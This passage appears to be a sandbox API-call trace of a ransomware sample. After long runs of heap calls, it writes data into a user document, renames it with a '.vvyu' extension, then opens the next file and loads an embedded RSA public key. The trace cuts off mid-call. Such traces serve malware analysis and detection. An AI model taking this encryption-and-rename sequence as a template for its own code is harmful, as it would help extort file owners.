(HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0194.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0194.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d423d0 [0194.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0194.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42418 [0194.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0194.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0194.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0194.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0194.591] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0194.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0194.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0194.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a048 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a030 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0194.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0194.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0194.594] GetCurrentThreadId () returned 0x264 [0194.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0194.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d463f0 [0194.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0194.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0194.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0194.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0194.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.595] GetCurrentThreadId () returned 0x264 [0194.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0194.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0194.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0194.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0194.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0194.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0194.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0194.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0194.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a048 [0194.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0194.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0194.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0194.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0194.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0194.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0a8 [0194.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0194.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0194.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0194.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0c0 [0194.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a060 [0194.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0194.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0194.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0194.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a030 [0194.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0194.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0194.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0194.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0194.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2feb8 [0194.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0194.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0194.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0194.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42908 [0194.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0194.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0194.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0194.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0194.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0194.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0194.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2feb8 | out: hHeap=0x6a0000) returned 1 [0194.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0194.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0194.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0194.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0194.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42418 | out: hHeap=0x6a0000) returned 1 [0194.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0194.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0194.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0194.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0194.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0194.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0194.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0194.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0194.608] WriteFile (in: hFile=0x574, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x12115, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x12115, lpOverlapped=0x0) returned 1 [0194.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0194.610] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0x1211a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.610] WriteFile (in: hFile=0x574, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0194.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0194.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0194.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0194.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0194.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0194.611] WriteFile (in: hFile=0x574, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0194.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0194.611] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.611] WriteFile (in: hFile=0x574, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0194.611] CloseHandle (hObject=0x574) returned 1 [0194.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0194.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d2cc80 [0194.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0194.614] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\JgOlJrnOpIeAMFOF-hp.ots" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\jgoljrnopieamfof-hp.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\JgOlJrnOpIeAMFOF-hp.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\jgoljrnopieamfof-hp.ots.vvyu")) returned 1 [0194.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0194.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.619] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0194.621] FindNextFileW (in: hFindFile=0x2cbfa50, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59b08db0, ftCreationTime.dwHighDateTime=0x1d89df9, ftLastAccessTime.dwLowDateTime=0x4a931950, ftLastAccessTime.dwHighDateTime=0x1d8a0a2, ftLastWriteTime.dwLowDateTime=0x4a931950, ftLastWriteTime.dwHighDateTime=0x1d8a0a2, nFileSizeHigh=0x0, nFileSizeLow=0x14aeb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jnZKj8ReDOajZL.xls", cAlternateFileName="JNZKJ8~1.XLS")) returned 1 [0194.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0194.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0194.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0194.622] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\jnZKj8ReDOajZL.xls") returned=".xls" [0194.622] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\jnZKj8ReDOajZL.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\jnzkj8redoajzl.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x574 [0194.636] GetFileSizeEx (in: hFile=0x574, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=84715) returned 1 [0194.636] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0194.639] SetFilePointerEx (in: hFile=0x574, liDistanceToMove=0x14ac5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.639] ReadFile (in: hFile=0x574, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0194.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.657] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.657] ReadFile (in: hFile=0x574, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x14aeb, lpOverlapped=0x0) returned 1 [0194.658] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0194.658] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.658] lstrlenA (lpString="-----BEGIN PUBLIC 